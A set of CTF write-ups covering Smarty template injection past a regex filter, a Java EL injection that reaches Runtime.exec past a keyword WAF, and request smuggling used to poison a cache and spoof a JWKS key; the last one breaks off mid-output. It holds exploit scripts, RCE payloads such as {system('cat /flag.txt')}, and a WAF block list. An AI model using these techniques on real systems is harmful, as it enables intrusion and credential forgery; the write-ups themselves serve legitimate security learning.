This challenge was mostly the same as one from the 1337up CTF 2023, called Smarty Pants, which I solved :)
It comes with the following PHP source:
<?php
if(isset($_GET['source'])){
highlight_file(__FILE__);
die();
}
require('/var/www/vendor/smarty/smarty/libs/Smarty.class.php');
$smarty = new Smarty();
$smarty->setTemplateDir('/tmp/smarty/templates');
$smarty->setCompileDir('/tmp/smarty/templates_c');
$smarty->setCacheDir('/tmp/smarty/cache');
$smarty->setConfigDir('/tmp/smarty/configs');
$pattern = '/(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)/s';
if(!isset($_POST['data'])){
$smarty->assign('pattern', $pattern);
$smarty->display('index.tpl');
exit();
}
// returns true if data is malicious
function check_data($data){
global $pattern;
return preg_match($pattern,$data);
}
if(check_data($_POST['data'])){
$smarty->assign('pattern', $pattern);
$smarty->assign('error', 'Malicious Inputs Detected');
$smarty->display('index.tpl');
exit();
}
$tmpfname = tempnam("/tmp/smarty/templates", "FOO");
$handle = fopen($tmpfname, "w");
fwrite($handle, $_POST['data']);
fclose($handle);
$just_file = end(explode('/',$tmpfname));
$smarty->display($just_file);
unlink($tmpfname);
It basically:
Smarty templates let us use advanced functions through template tags enclosed in curly braces: { and }.
For example:
<h1>{$title|escape}</h1>
<ul>
{foreach $cities as $city}
<li>{$city.name|escape} ({$city.population})</li>
{foreachelse}
<li>no cities found</li>
{/foreach}
</ul>
The Smarty documentation gives us a simple solution for getting the flag:
The fetch function allows us to display the contents of a file, as simple as that:
{fetch file='/flag.txt'}
This template tag fetches the flag, but it is blocked by the regex filter. In the original CTF challenge, the filter was this:
/(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)/
To bypass this filter, I used an unintended solution, which was a line break:
{fetch file='/flag.txt'
}
That gave us the CTF challenge flag.
INTIGRITI{php_4nd_1ts_many_f00tgun5}
In the December challenge, there was a small but deadly change to the regex filter: the s modifier at the end:
/(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)/s
This small modifier makes the . match newlines too, which blocks our previous solution.
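To see the effect of that modifier in isolation, here is a minimal sketch that replays both payloads against the challenge pattern. It assumes Python's re module behaves like PCRE for this pattern (re.S plays the role of the s modifier); the helper name is_blocked is mine, not part of the challenge.

```python
import re

# The challenge pattern, copied from the PHP source without delimiters and flags.
PATTERN = r"(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)"


def is_blocked(data: str, dotall: bool) -> bool:
    """Return True when the filter would flag the input."""
    flags = re.S if dotall else 0
    return re.search(PATTERN, data, flags) is not None


one_line = "{fetch file='/flag.txt'}"
two_lines = "{fetch file='/flag.txt'\n}"

# Without the s modifier, the line break hides the closing brace from ".*".
print(is_blocked(one_line, dotall=False), is_blocked(two_lines, dotall=False))
# With the s modifier, "." also matches "\n", so both payloads are caught.
print(is_blocked(one_line, dotall=True), is_blocked(two_lines, dotall=True))
```

The only difference between the two runs is the flag, which is exactly the one-character change between the two challenges.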
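While studying ways to bypass the regex, I found that very long strings can break it: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp#length-error-bypass
When the PCRE engine gives up on a huge input (most likely by exceeding pcre.backtrack_limit), preg_match returns false instead of 1, and check_data treats that false as "not malicious".
So, the plan was to send a huge string. At first I was blocked by HTTP 413, but after tuning the length, I found a size that breaks the regex without being rejected by the server.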
"{fetch file='/flag.txt'}"+("a"*1000000)
This is basically the same payload, with a lot of a’s after it.
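The reason a failing regex helps us is the way the result is checked. Below is a toy model of that logic, not PHP's real engine: preg_match_model is a hypothetical stand-in that returns False for any input longer than the limit, which is a simplification of how PCRE actually counts backtracking steps.

```python
BACKTRACK_LIMIT = 1_000_000  # PHP's documented default for pcre.backtrack_limit


def preg_match_model(subject):
    """Toy stand-in for preg_match: 1 = match, 0 = no match, False = engine error."""
    if len(subject) > BACKTRACK_LIMIT:
        return False  # assumption: the engine gives up on inputs this large
    return 1 if "{" in subject and "}" in subject else 0


def loose_check(data):
    """Mirrors `if (check_data(...))`: only a truthy result blocks the input."""
    return bool(preg_match_model(data))


def strict_check(data):
    """Safer variant: an engine error is treated as malicious too."""
    result = preg_match_model(data)
    return result is False or result == 1


small = "{fetch file='/flag.txt'}"
huge = small + "a" * 1_000_000

print(loose_check(small))   # blocked
print(loose_check(huge))    # not blocked: the error is read as "no match"
print(strict_check(huge))   # blocked again once errors are handled
```

In PHP terms, the strict variant corresponds to comparing the return value with === false before trusting it.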
The final exploit was this:
import requests
data = {
'data': "{fetch file='/flag.txt'}"+("a"*1000000),
}
response = requests.post('https://challenge-1223.intigriti.io/challenge.php', data=data)
print(response.status_code)
print(response.text)
And by running it, we get the flag:
$ python int_dez23.py | cut -c-100
200
INTIGRITI{7h3_fl46_l457_71m3_w45_50_1r0n1c!}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Flag
INTIGRITI{7h3_fl46_l457_71m3_w45_50_1r0n1c!}
I just found that I can also get RCE with the {system} function.
{system('cat /flag.txt')}aaa...
python int_dez23.py | cut -c-100
200
challenge.php
index.php
resources
The impact is higher :)
SekaiCTF is a Capture The Flag event hosted by Team Project Sekai, with some hardcore members of CTF Community.
Web challenges were fun. I worked on 3 and solved 2.
That was a hell of a team effort with Regne, Rafael, Natã and Alisson.
In this challenge, you are presented with a Contact List. After adding, it shows the contacts on the top of the page.
It looks like a typical XSS challenge, but there is no bot involved, so it’s something else.
We can use the source code of the challenge to run it locally.
$ ./build-docker.sh
Sending build context to Docker daemon 949.2kB
Step 1/12 : FROM gradle:7.5-jdk11-alpine AS build
---> 90b77c8e5ac0
Step 2/12 : COPY --chown=gradle:gradle build.gradle settings.gradle /home/gradle/frogwaf/
... BUNCH OF LINES
Successfully built a688b08fada6
Successfully tagged sekai_web_waffrog:latest
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/////////@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@////////*************@@@@@@@@@@@////////*************(@@@@@@@@
@@@@@@@@@@@@@@@/////*****************************/////********************@@@@@@
@@@@@@@@@@@@@////*///%%%(//////#%#/****************************////%%///*,%%@@@@
@@@@@@@@@@@@////%%////,,,,,,.....,,,%***********************///%//,,,,...,,,%@@@
@@@@@@@@@@@///#%///,,,,,,,,%&/,,,,.,,#********************///%//,,,,,,&&/ &&*%@@
@@@@@@@@@@///%%///,,,,&&&&&&% &&&,,,,%******************///%//,,,,&&&&&&&&&&%@@
@@@@@@@@/////%///*,,&&&&&&&&&&&&&&&,,,%*****************///%//*,,,&&&&&&&&&&&%@@
@@@@@@@/////(%////,,,&&&&&&&&&&&&(,,,,%*****************///%///,,,,,,&&&&&,,%%@@
@@@@@@///////%%////,,,,,,,,,,,,,,,,,,%****************..*//%%///,,,,,,,,,,(%&@@@
@@@@//////////%%%////,,,,,,,,,,,,,,%/*****************,..*//%%/////,,,,/%%//@@@@
@@@//////////////%%%%/////////(%%#/********************...**//#%%%%%%%%//**/*@@@
@@/////*********///////////////**************************....***************//@@
@@/////*************************************(/********(((****,.*************//(@
@@/////**.(*******************************.(((********.((.****************//(,@@
@@/////*,.((/*****************************..*************,*************//((,..@@
@@@////***(*,,,((//*************************************************//((,,...@@@
@@@@////**,,,...,,,,(((////**************************,....****///(((,,,....%@@@@
@@@@@@///**,,,......,,,,,,,(((((/////////**********////////(((*,,,,.......@@@@@@
@@@@@@@///*,,,,...........,,,,,,,,,,,,,/((((((((((((,,,,,...,,...........@@@@@@@
@@@@@@@@@///,,,,....................,,,,,,,,,,,,,,,,,,.................@@@@@@@@@
@@@@@@@@@@@//,,,,,..................................................,@@@@@@@@@@@
@@@@@@@@@@@@@#/,,,,,..............................................,%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@/,,,,,,........................................,,@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@%,,,,,,,.................................,,,(@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,.......................,,,,,%@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
2023-09-03 15:41:10.974 INFO 1 --- [ main] com.sekai.app.Application : Starting Application on 5ee0fb50de34 with PID 1 (/opt/frogwaf/frogwaf-0.0.1-SNAPSHOT.jar started by app in /)
... ANOTHER BUNCH OF LINES
2023-09-03 15:48:53.574 INFO 1 --- [nio-1337-exec-1] o.s.web.servlet.DispatcherServlet : Completed initialization in 18 ms
Now, the app is available on http://localhost:1337.
(Judging by the last CTFs I played, hackers are really addicted to frogs).
First place to look here is the Dockerfile.
FROM gradle:7.5-jdk11-alpine AS build
COPY --chown=gradle:gradle build.gradle settings.gradle /home/gradle/frogwaf/
COPY --chown=gradle:gradle src/ /home/gradle/frogwaf/src/
WORKDIR /home/gradle/frogwaf
RUN gradle bootJar
FROM openjdk:11-slim
COPY flag.txt /flag.txt
RUN mv /flag.txt /flag-$(head -n 1000 /dev/random | md5sum | head -c 32).txt
RUN addgroup --system --gid 1000 app && adduser --system --group --uid 1000 app
COPY --chown=app:app --from=build /home/gradle/frogwaf/build/libs/*.jar /opt/frogwaf/
USER app
ENTRYPOINT ["java", "-jar", "/opt/frogwaf/frogwaf-0.0.1-SNAPSHOT.jar"]
Dockerfile Summary
In my local container:
$ docker exec -it sekai_web_waffrog bash -c "ls -l flag*"
-rw-rw-r-- 1 root root 17 Aug 16 16:09 flag-453b00d5b87528dc7324eb2e93c709b5.txt
The name is generated at build-time, so it’s different on the actual challenge server.
There are a lot of files, so I won’t go into detail on every one. Let’s see some important files:
// ... Java verbosities
@Getter
@Setter
@Entity
public class Contact {
@Id
@GeneratedValue
private Long id;
@NotNull
@Pattern(regexp = "^[A-Z][a-z]{2,}$")
private String firstName;
@NotNull
@Pattern(regexp = "^[A-Z][a-z]{2,}$")
private String lastName;
@NotNull
@Pattern(regexp = "^[A-Z][a-z]{2,}$")
private String description;
@NotNull
@CheckCountry
private String country;
}
Contact Summary
// ... Java verbosities
@Target({FIELD, METHOD, PARAMETER, ANNOTATION_TYPE, TYPE_USE})
@Retention(RUNTIME)
@Constraint(validatedBy = CountryValidator.class)
@Documented
@Repeatable(CheckCountry.List.class)
public @interface CheckCountry {
String message() default "Invalid country";
Class<?>[] groups() default {};
Class<? extends Payload>[] payload() default {};
@Target({FIELD, METHOD, PARAMETER, ANNOTATION_TYPE})
@Retention(RUNTIME)
@Documented
@interface List {
CheckCountry[] value();
}
}
CheckCountry Summary
A lot is going on here, but the important part is the line below:
@Constraint(validatedBy = CountryValidator.class)
Which takes us to the last piece of important code for now.
// ... Java verbosities
public class CountryValidator implements ConstraintValidator<CheckCountry, String> {
@SneakyThrows
@Override
public boolean isValid(final String input, final ConstraintValidatorContext constraintContext) {
if (input == null) {
return true;
}
val v = FrogWaf.getViolationByString(input);
if (v.isPresent()) {
val msg = String.format("Malicious input found: %s", v);
throw new AccessDeniedException(msg);
}
val countries = StreamUtils.copyToString(new ClassPathResource("countries").getInputStream(), Charset.defaultCharset()).split("\n");
val isValid = Arrays.asList(countries).contains(input);
if (!isValid) {
val message = String.format("%s is not a valid country", input);
constraintContext.disableDefaultConstraintViolation();
constraintContext.buildConstraintViolationWithTemplate(message)
.addConstraintViolation();
}
return isValid;
}
}
CountryValidator Summary
The vulnerable code is the line below:
constraintContext.buildConstraintViolationWithTemplate(message).addConstraintViolation();
The buildConstraintViolationWithTemplate method processes Java EL. Since we can control part of the message variable, it is basically a Template Injection for us.
To keep it simple, let’s send payloads where every field is valid except for the country, which is our attack surface.
I don’t remember how we found out that message is a variable interpreted in the EL.
Let’s test some payloads on the /addContact route.
{
"firstName":"Hey",
"lastName":"You",
"description":"Abc",
"country":"{message}"
}
{
"violations": [
{
"fieldName": "country",
"message": "Invalid country is not a valid country"
}
]
}
Invalid country is the default return value of the message method on the CheckCountry.java interface.
By using the dollar sign, we can start playing better games with our message variable.
{
"firstName":"Hey",
"lastName":"You",
"description":"Abc",
"country":"${message.getClass().toString()}"
}
{
"violations": [
{
"fieldName": "country",
"message": "class java.lang.String is not a valid country"
}
]
}
Nice. So, let’s just use EL to get RCE using the Runtime class, right? Wait A Freaking minute…
Now we arrive at the challenge name, which is the WAF. Let’s take a look at the WAF request interceptor.
// ... Java verbosities
@Configuration
@Order(Integer.MIN_VALUE)
public class FrogWaf implements HandlerInterceptor {
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object obj) throws Exception {
// Uri
val query = request.getQueryString();
if (query != null) {
val v = getViolationByString(query);
if (v.isPresent()) {
throw new AccessDeniedException(String.format("Malicious input found: %s", v));
}
}
return true;
}
public static Optional<WafViolation> getViolationByString(String userInput) {
for (val c : AttackTypes.values()) {
for (val m : c.getAttackStrings()) {
if (userInput.contains(m)) {
return Optional.of(new WafViolation(c, m));
}
}
}
return Optional.empty();
}
}
WAF Summary
The getViolationByString function checks if a string contains a violation of the WAF.
It is used when validating the Country.
The preHandle function checks the query string, but it is useless for solving the challenge.
Let’s check the WAF rules.
// ... Java verbosities
public enum AttackTypes {
SQLI("\"", "'", "#"),
XSS(">", "<"),
OS_INJECTION("bash", "&", "|", ";", "`", "~", "*"),
CODE_INJECTION("for", "while", "goto", "if"),
JAVA_INJECTION("Runtime", "class", "java", "Name", "char", "Process", "cmd", "eval", "Char", "true", "false"),
IDK("+", "-", "/", "*", "%", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
@Getter
private final String[] attackStrings;
AttackTypes(String... attackStrings) {
this.attackStrings = attackStrings;
}
}
WAF Filters Summary
OK, now we got a really restrictive filter for a lot of kinds of attacks. Let’s check our previous payload using some of the forbidden keywords.
Payload
${".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
Response
Malicious input found: Optional[WafViolation(attackType=SQLI, attackString=")]
The response comes as HTML, because we’re blocked by the WAF. Let’s make it a little simpler:
Payload
${java.lang.Runtime}
Response
Optional[WafViolation(attackType=JAVA_INJECTION, attackString=Runtime)]
Some words shall not be spoken.
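To test payloads offline before sending them, the WAF check can be mirrored in a few lines. This is a sketch that assumes the Java enum is iterated in declaration order and that contains() is a plain substring test; the names ATTACK_TYPES and get_violation are mine.

```python
# Blocked substrings, copied from the AttackTypes enum in declaration order.
ATTACK_TYPES = {
    "SQLI": ['"', "'", "#"],
    "XSS": [">", "<"],
    "OS_INJECTION": ["bash", "&", "|", ";", "`", "~", "*"],
    "CODE_INJECTION": ["for", "while", "goto", "if"],
    "JAVA_INJECTION": ["Runtime", "class", "java", "Name", "char", "Process",
                       "cmd", "eval", "Char", "true", "false"],
    "IDK": ["+", "-", "/", "*", "%"] + [str(d) for d in range(10)],
}


def get_violation(user_input):
    """Return (attack_type, attack_string) for the first hit, or None if clean."""
    for attack_type, needles in ATTACK_TYPES.items():
        for needle in needles:
            if needle in user_input:
                return attack_type, needle
    return None


print(get_violation("${java.lang.Runtime}"))
print(get_violation("${message.getClass().getClass().toString()}"))
```

Note that the check is case-sensitive, which is why getClass() passes even though class is on the list.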
Although the WAF blocks a lot of important keywords and chars, it allows us some basic important chars:
()
.
[]
lang, size, ..
We have to build from here using Java Reflection, which gives us a lot of power.
First of all, two classes will help us get the rest:
java.lang.String (shown in the first payload)
java.lang.Class
To get the Class, we just need another getClass():
Payload
${message.getClass().getClass().toString()}
Response
class java.lang.Class is not a valid country
We can avoid a lot of basic strings, but we really need numbers. We came up with a simple (but verbose) solution, using array sizes.
Payload
${[null, null, null, null].size()}
Response
4 is not a valid country
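Writing those lists by hand gets old fast, so a tiny generator helps. This is a sketch of the idea only: el_number is a hypothetical helper name, and the n = 0 case (an empty list) is an assumption I did not verify against the EL parser.

```python
def el_number(n: int) -> str:
    """Build an EL expression that evaluates to n without using any digit."""
    if n < 0:
        raise ValueError("only non-negative numbers can be expressed as a list size")
    # n == 0 yields "[].size()", which is an untested assumption.
    return "[" + ", ".join(["null"] * n) + "].size()"


print(el_number(4))
print(len(el_number(65)))  # the expression grows linearly with the number
```

The linear growth is one reason the final payload got so large.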
We can call methods dynamically by listing the methods of a class with getMethods and accessing them by their index.
To find classes by name and instantiate them, we would like to use the Class.forName method, but the for and Name strings are blocked.
Since forName sits at index 2 of the Class methods, we can get the method by index.
Payload
${message.getClass().getClass().getMethods()[[null, null].size()]}
Response
public static java.lang.Class java.lang.Class.forName(java.lang.String) throws java.lang.ClassNotFoundException is not a valid country
We had to loop through the methods of some classes to find the right indexes. Using the same concept, we can call the substring method from the String class we already have access to.
As with numbers, we need strings to compose our calls (like class names for the Class.forName call). We can’t just send string literals, because single and double quotes are blocked. We need some existing strings.
At first we have the message variable, but it doesn’t contain enough of the alphabet.
It gets too complex to summarize here, but let’s try.
Since we can navigate all methods and fields of the java.lang.String and java.lang.Class classes and convert their names to String, we can use substring on them to get most of the alphabet.
To do it, we first built a dictionary of substring origins to compose strings.
Since the plus sign is also blocked, we can use String.concat to make the magic.
It would be something like this (“simplified” version):
message.getClass().getMethods()[12].toString().substring(12,13).concat(message.getClass().getMethods()[14].toString().substring(40,41))
…
Now we don’t have the whole ASCII table, but we have enough of the alphabet to use java.lang.Character.toString(int char).
To get ASCII A, that would be something like this:
Class.forName("java.lang.Character").getMethods()[5].invoke(null, 65)
We can write a complete string generator, for any char, bypassing the WAF restrictions.
Now we can instantiate any class and call any method, with any strings and numbers as parameters.
We can combine these components to use java.lang.Runtime for RCE. The plan is to use something like the payload below.
${message.getClass().forName("java.lang.Runtime").getRuntime().exec("ls")}
We also need to read the result of the command, so we have to wrap the process output in a reader (assuming a 1-line result, to simplify):
${
new BufferedReader(
new InputStreamReader(
message.getClass().forName("java.lang.Runtime").getRuntime().exec("ls -l").getInputStream()
)
).readLine();
}
When calling ls -l, we got the first line.
total 68 is not a valid country
This is the summary line that ls -l prints first: the total number of disk blocks used by the entries in the / directory, not a file count.
RCE is here. Almost there.
For a reason I didn’t know at challenge time, commands with some special bash characters (*, |) were not working. Since the flag name is random, we need to find it.
Rafael came up with a find by permission to get just the flag file name in the first result line.
find / -maxdepth 1 -type f -perm 0664
Result:
/flag-7662fe897b3335f35ff4c3c81b9e6371.txt
Now, let’s just cat it (locally):
SEKAI{7357_fl46} is not a valid country
On the challenge server:
SEKAI{0h_w0w_y0u_r34lly_b34t_fr0g_wAf_c0ngr4ts!!!!}
Fun for the whole CTF Family!
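The solution could probably be simpler on the Java side. For reading the process output, I could maybe read all of the output in one call, without all of the usual Java bullshitting.
I heard later that the Runtime class has some issues with the special characters we need for bash. I don’t know all the details yet, but as far as I understand, Runtime.exec(String) splits the command on whitespace and runs the program directly, without a shell, so characters like * and | are passed as literal arguments instead of being interpreted. That explains why we couldn’t just get the flag in a simpler way.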
Java has some cool modern stuff, but I only know it from darker times.
Also the final payload got huge! (120k chars) I saw a much smaller one (24k chars) on Discord.
Just saw the official solution and I think we got somewhat close :) Their solution for numbers was MUCH better.
The source-code of the challenge is also available here, so you can follow it locally.
We basically create posts here and we can see the post content on a URL with the format:
http://localhost:8080/post/<user_uuid>/<post_uuid>
On my sample:
http://localhost:8080/post/0c0b30cf-3d4b-470c-8486-e90ef9d6a778/ffce8a86-652c-4c70-88bb-afa6e182301e
This is not an XSS challenge, so we will look for a more direct attack.
The post itself is just a boring concatenation of the title with the content.
Let’s find our objective here: the flag is available only on the blog app. Since there is a lot of code, I won’t go into details, but there is an /admin path that we need to understand:
from flask import Blueprint, request, session
import os
import jwt
import requests

admin_bp = Blueprint("admin", __name__, url_prefix="/admin")
jwks_url_template = os.getenv("JWKS_URL_TEMPLATE")
valid_algo = "RS256"


def get_public_key_url(user_id):
    return jwks_url_template.format(user_id=user_id)


def get_public_key(url):
    resp = requests.get(url)
    resp = resp.json()
    key = resp["keys"][0]["x5c"][0]
    return key


def has_valid_alg(token):
    header = jwt.get_unverified_header(token)
    algo = header["alg"]
    return algo == valid_algo


def authorize_request(token, user_id):
    pubkey_url = get_public_key_url(user_id)
    if has_valid_alg(token) is False:
        raise Exception(
            "Invalid algorithm. Only {valid_algo} allowed!".format(
                valid_algo=valid_algo
            )
        )
    pubkey = get_public_key(pubkey_url)
    print(pubkey, flush=True)
    pubkey = "-----BEGIN PUBLIC KEY-----\n{pubkey}\n-----END PUBLIC KEY-----".format(
        pubkey=pubkey
    ).encode()
    decoded_token = jwt.decode(token, pubkey, algorithms=["RS256"])
    if "user" not in decoded_token:
        raise Exception("user claim missing!")
    if decoded_token["user"] == "admin":
        return True
    return False


@admin_bp.before_request
def authorize():
    if "user_id" not in session:
        return "User not signed in!", 403
    if "Authorization" not in request.headers:
        return "No Authorization header found!", 403
    authz_header = request.headers["Authorization"].split(" ")
    if len(authz_header) < 2:
        return "Bearer token not found!", 403
    token = authz_header[1]
    if not authorize_request(token, session["user_id"]):
        return "Authorization failed!", 403


@admin_bp.route("/flag")
def flag():
    return os.getenv("FLAG")
The /admin/flag route gives us the flag, but the price is an Authorization header with a JWT token. This token should be signed with a private RSA key, which we don’t have.
The public key for decoding is available for us at the URL:
http://localhost:8080/any_string/.well-known/jwks.json
The any_string part is supposed to be a user UUID, but the app does not validate it.
{
"keys": [
{
"alg": "RS256",
"x5c": [
"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqwbbx3Ih7YDR+GB9kX+3\nZ/MXkVyj0Bs+E1rCph3XyAEDzft5SgK/xq4SHO48RKl+M17eJirDOnWVvHqnjxyC\nig2Ha/mP+liUBPxNRPbJbXpn9pmbYLR/7LIUvKizL9fYdYyQnACLI1OdAD/PKLjQ\nIAUGi6a8L37VQOjmf6ooLOSwKdNq/aM4eFpciKNZ3gO0YMc6SC17Jt/0L9aegxqt\nVwEXQou1/yisLuzEY6LmKEbTXuX9oSVFzd/FXi2xsLrD4nqI/HAiRoYnK1gAeglw\nF23h8Hc8jYoXgdZowt1+/XuDPfHKsP6f0MLlDaJAML2Ab6fJk3B1YkcrAZap4Zzu\nAQIDAQAB"
]
}
]
}
OK, the public key is there, but we can’t do anything with it on its own.
Some things to note here:
/admin/flag, with an Authorization header that will decode successfully.
After many years of guys like you hacking stuff, modern HTTP servers have many security protections, but you can’t expect that from small custom projects. That is where our cache server comes in.
When you have multiple web servers working in a chained fashion, we can try a Request Smuggling approach.
I won’t explain it in detail, because it will never get better than what the guys at PortSwigger did in the link above.
If you want to learn even more, I suggest reading the excellent Request Smuggling research articles from PortSwigger Research, mostly by the master-hacker-defcon-talker James Kettle a.k.a. albinowax.
To summarize: the custom cache uses the Content-Length header to know the size of the request body. The HTTP specification says that Transfer-Encoding is prioritized over Content-Length, but our custom cache just ignores that.
(And now we know why the name of the challenge is Chunky)
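To make the disagreement concrete, here is a minimal sketch of a request that carries both headers, parsed in the two ways described above. The paths /post/A and /post/B, the host, and the two tiny parsers are illustrative assumptions, not the code of the real cache or of nginx, and the chunked parser ignores trailers.

```python
def build_request(host: bytes, smuggled: bytes) -> bytes:
    """POST whose body is an empty chunked message followed by a second request."""
    body = b"0\r\n\r\n" + smuggled
    head = (
        b"POST /post/A HTTP/1.1\r\n"
        b"Host: " + host + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
    )
    return head + b"\r\n" + body


def split_by_content_length(raw: bytes):
    """Front-end view: trust Content-Length. Returns (body, leftover bytes)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return rest[:length], rest[length:]


def split_by_chunked(raw: bytes):
    """Back-end view: trust Transfer-Encoding. Returns (body, leftover bytes)."""
    _, _, rest = raw.partition(b"\r\n\r\n")
    pos, body = 0, b""
    while True:
        line_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            pos += 2  # skip the CRLF that closes the last chunk
            break
        body += rest[pos:pos + size]
        pos += size + 2
    return body, rest[pos:]


smuggled = b"GET /post/B HTTP/1.1\r\nHost: localhost\r\n\r\n"
raw = build_request(b"localhost", smuggled)
print(split_by_content_length(raw)[1])  # nothing left over: one request
print(split_by_chunked(raw)[1])         # the smuggled request is left over
```

The leftover bytes in the second view are what the back-end treats as a brand-new request on the same connection.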
Nice, we can smuggle requests…
One of the options available with Request Smuggling is Cache Poisoning.
While smuggling the second request (B) inside the first one (A), the backend tries to send the (B) response, but the front-end does not read it, because it believes it has already received the complete answer.
When we send a third request (C), the front-end sends it to the backend, but receives the response from (B), which is still enqueued!
If the front-end is a cache - our scenario - it caches the content of (B) for the URL of (C).
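The queue mix-up is easier to see in a toy simulation. This sketch models only the ordering problem: Backend and CachingFrontend are hypothetical classes of mine, responses are plain strings, and the second argument of forward stands for what the back-end parses out of the bytes it receives.

```python
from collections import deque


class Backend:
    """Answers every request it parses, in order, on one shared connection."""

    def __init__(self):
        self.pending = deque()

    def receive(self, parsed_paths):
        for path in parsed_paths:
            self.pending.append(f"response for {path}")

    def read_one(self):
        return self.pending.popleft()


class CachingFrontend:
    """Reads exactly one response per request it thinks it sent, then caches it."""

    def __init__(self, backend):
        self.backend = backend
        self.cache = {}

    def forward(self, url, seen_by_backend):
        if url in self.cache:
            return self.cache[url]
        self.backend.receive(seen_by_backend)
        response = self.backend.read_one()
        self.cache[url] = response
        return response


backend = Backend()
frontend = CachingFrontend(backend)

# Request A carries B inside it: one request for the cache, two for the back-end.
first = frontend.forward("/post/A", ["/post/A", "/post/B"])
# Request C now receives the response that was still waiting in the queue.
second = frontend.forward("/post/C", ["/post/C"])
# Later visitors of C are served the poisoned entry straight from the cache.
third = frontend.forward("/post/C", ["/post/C"])
print(first, second, third, sep="\n")
```

Swap /post/C for the JWKS URL and /post/B for a post we control, and you have the shape of the attack.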
OK, let’s try it prettier.
Since this concept may be hard to follow, let’s follow the flow by the numbers.
If you look at vertices 4 and 9, we have our first desync: the cache sends 1 request, but nginx understands it as 2.
That will result, later, in vertex 16, where the answer to /post/C will be the response of /post/B that is waiting to be written to the socket by nginx.
That means future GETs to post C will get the content of B.
But… we still need to use it to get the flag.
Since we have a plan to control the contents of some URLs through Cache Poisoning, we can poison our user JWKS URL with a controlled content.
Now we can use a kind of JWKS Spoofing, creating a post whose content has the same format as the JWKS from the app, but using the public key of a key pair created by us :)
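Building that fake JWKS is mostly string handling. Here is a minimal sketch, assuming the admin code wraps x5c[0] between the BEGIN and END markers by itself (as in authorize_request), so only the base64 body goes into the document. pem_to_jwks is a hypothetical helper and the PEM below is a placeholder, not a real key.

```python
import json


def pem_to_jwks(public_pem: str) -> str:
    """Turn a PEM public key into a JWKS document shaped like the app's."""
    lines = [line.strip() for line in public_pem.strip().splitlines()]
    # Drop the "-----BEGIN/END PUBLIC KEY-----" markers, keep the base64 body.
    body = [line for line in lines if line and not line.startswith("-----")]
    return json.dumps({"keys": [{"alg": "RS256", "x5c": ["\n".join(body)]}]})


# Placeholder PEM just to show the shape; use your own generated public key.
fake_pem = "-----BEGIN PUBLIC KEY-----\nQUJD\nREVG\n-----END PUBLIC KEY-----\n"
jwks = pem_to_jwks(fake_pem)
print(jwks)
```

The resulting string is what goes into the post content, so that the poisoned URL serves it in place of the real JWKS.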
Let’s view the same diagram again, but with this plan in mind.
Now we have a plan.
The exploit has some basic functions to signup, login and create_post, which we will need in the attack.
We generated the key pair local_key3 and local_key3.pub, which we will use to poison our JWKS URL.
There are 3 files that make up the templates of the requests we will send, as in the diagram:
desync1.txt == POST A, with the Content-Length and Transfer-Encoding headers that will cause our desync.
desync2.txt == GET /post/<user_uuid>/<post_uuid_of_poisoned_jwks>
desync3.txt == GET /user_uuid/.well-known/jwks.json
The complete workflow of the final exploit is:
/admin/flag with the token from (6)
Run!!
$ python attack.py nep500
===== SIGNUP
/login
===== LOGIN
/
===== POST
URL: /post/e8b30077-4b64-4582-8027-f3bf17b679c1/3d1121b4-02e8-4976-bb47-53787c4b2d96
USER_ID: e8b30077-4b64-4582-8027-f3bf17b679c1
POST_ID: 3d1121b4-02e8-4976-bb47-53787c4b2d96
===== DESYNC!!
[+] Opening connection to localhost on port 8080: Done
===============> First Response (Expect Error 400)
b'<!doctype html>\n<html lang=en>\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to the target URL: <a href="/post/e8b30077-4b64-4582-8027-f3bf17b679c1/9a3fc219-5c92-45d2-9800-efb517f61799">/post/e8b30077-4b64-4582-8027-f3bf17b679c1/9a3fc219-5c92-45d2-9800-efb517f61799</a>. If not, click the link.\n'
===============> End of First Response
===============> Second Response (Expect Fake Key)
